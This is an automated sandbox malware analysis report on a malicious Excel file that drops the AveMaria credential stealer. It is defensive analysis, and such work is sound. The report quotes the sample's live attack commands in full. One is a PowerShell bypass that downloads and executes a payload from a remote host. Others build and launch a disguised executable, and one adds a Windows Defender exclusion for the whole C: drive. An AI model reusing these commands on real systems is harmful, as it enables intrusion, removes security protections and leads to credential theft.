
Analysis Report Telex06012020.xls

Overview

General Information

Sample Name: Telex06012020.xls
Analysis ID: 337287
MD5: c221348cc4be1ca5c8d1fe510c672e57
SHA1: b7bbcb23c92782d871a684afc34e4c8264e96b8e
SHA256: 07a877cc1499b20ae7bcaf0200f2576a100754fa661e391f36cbb95aa58a75b9
Tags: xls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 AveMaria
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected AveMaria stealer
Yara detected Generic Dropper
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to create processes via WMI
Contains functionality to hide user accounts
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Installs a global keyboard hook
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Spawns drivers
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6472 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 1836 cmdline: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )) MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5848 cmdline: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )) MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • csc.exe (PID: 6108 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 6504 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)
        • cmd.exe (PID: 7036 cmdline: 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 6924 cmdline: 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • WMIC.exe (PID: 6992 cmdline: Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
  • Test3.jpg (PID: 6852 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: DD27F33FCD6F1FA4C67EE05D836795C2)
    • Test3.jpg (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: DD27F33FCD6F1FA4C67EE05D836795C2)
      • powershell.exe (PID: 5368 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5384 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Telex06012020.xls | PowerShell_in_Word_Doc | Detects a powershell and bypass keyword in a Word document | Florian Roth
  • 0x1cf5e:$s1: poWeRSheLL.EXe
  • 0x1cf72:$s2: BYPAsS
Telex06012020.xls | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x1cf5e:$s1: poWeRSheLL
Telex06012020.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\DCC40000 | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x1c7e0:$s1: poWeRSheLL
C:\Users\user\AppData\Local\Temp\Test1.txt | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
C:\Users\user\AppData\Local\Temp\Test1.txt | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x42de8:$c1: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\Test3.jpg | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
C:\Users\user\AppData\Local\Temp\Test3.jpg | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x42de8:$c1: Elevation:Administrator!new:

Memory Dumps

Source | Rule | Description | Author | Strings
00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xde8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xde8:$c1: Elevation:Administrator!new:
00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x2c8ac:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x2c8ac:$c1: Elevation:Administrator!new:
00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x1d88:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x4b90:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x1d88:$c1: Elevation:Administrator!new:
  • 0x4b90:$c1: Elevation:Administrator!new:
(37 entries in total; the remaining entries are not shown here)

Unpacked PEs

Source | Rule | Description | Author | Strings
18.0.Test3.jpg.400000.0.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
18.0.Test3.jpg.400000.0.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x42de8:$c1: Elevation:Administrator!new:
18.2.Test3.jpg.400000.0.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
18.2.Test3.jpg.400000.0.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x42de8:$c1: Elevation:Administrator!new:
19.2.Test3.jpg.400000.0.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
(31 entries in total; the remaining entries are not shown here)

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5848, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', ProcessId: 6108
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data: Command: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), CommandLine: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6472, ProcessCommandLine: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ProcessId: 1836
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5848, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', ProcessId: 6108
Sigma detected: Group Modification Logging
Source: Event Logs | Author: Alexandr Yampolskyi, SOC Prime | Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -
Sigma detected: Local User Creation
Source: Event Logs | Author: Patrick Bareiss | Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: .mFDHma, data 1: computer, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-3853321935-2125563209-4053062332-1003, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-3853321935-2125563209-4053062332-1002, data 4: user, data 5: computer, data 6: 0x2005f, data 7: -, data 8: .mFDHma, data 9: %%1793

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Avira: detection malicious, Label: TR/Redcap.ghjpt
Source: C:\Users\user\AppData\Local\Temp\Test1.txt | Avira: detection malicious, Label: TR/Redcap.ghjpt
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Microsoft DN1\sqlmap.dll | Metadefender: Detection: 22%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll | ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: Telex06012020.xls | Virustotal: Detection: 12%
Yara detected AveMaria stealer
Source: Yara match | File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Test1.txt | Joe Sandbox ML: detected
Source: 19.1.Test3.jpg.400000.0.unpack | Avira: Label: TR/Redcap.ghjpt
Source: 18.2.Test3.jpg.2ae0000.1.unpack | Avira: Label: TR/Redcap.ghjpt
Source: 19.0.Test3.jpg.400000.0.unpack | Avira: Label: TR/Redcap.ghjpt
Source: 22.2.cmd.exe.5250000.1.unpack | Avira: Label: TR/Dropper.Gen
Source: 18.0.Test3.jpg.400000.0.unpack | Avira: Label: TR/Redcap.ghjpt
Source: 18.2.Test3.jpg.400000.0.unpack | Avira: Label: TR/Redcap.ghjpt
Source: 19.2.Test3.jpg.400000.0.unpack | Avira: Label: TR/Redcap.ghjpt
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 18_2_00426ED0 __vbaAryLock,__vbaAryUnlock,#644,#644,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 18_2_00426B80 __vbaAryLock,__vbaAryUnlock,__vbaAryLock,__vbaStrVarCopy,__vbaStrMove,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaLenBstrB,CryptHashData,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarZero,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaAryLock,__vbaAryLock,CryptDecrypt,__vbaAryUnlock,__vbaRedimPreserve,__vbaFreeStr,
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Directory created: C:\Program Files\Microsoft DN1
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' | source: csc.exe, 0000000A.00000002.752607255.0000000001210000.00000002.00000001.sdmp
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb | source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp
Source: Binary string: RfxVmt.pdb | source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
Source: Binary string: RfxVmt.pdbGCTL | source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb | source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdbUGP | source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Source: global traffic | DNS query: name: lankarecipes.com
Source: global traffic | TCP traffic: 192.168.2.4:49728 -> 192.185.236.165:80 (reported 2 times)
Source: global traffic | TCP traffic: 192.168.2.4:49747 -> 37.46.150.86:5200
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: global traffic | HTTP traffic detected:
  GET /mages.jpg HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
  Host: lankarecipes.com
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 37.46.150.86 (reported 50 times)
Source: unknown | DNS traffic detected: queries for: lankarecipes.com
Source: PowerShell_transcript.179605.1KVzgujm.20210108093427.txt.3.dr | String found in binary or memory: http://lankarecipes.com/mages.jp
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000015.00000002.877459698.0000000004FD1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp, sqlmap.dll.19.dr | String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.cortana.ai
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.office.net
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.onedrive.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://augloop.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://augloop.office.com/v2
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://cdn.entity.
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://cortana.ai
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://cortana.ai/api
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://cr.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dev.cortana.ai
        Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
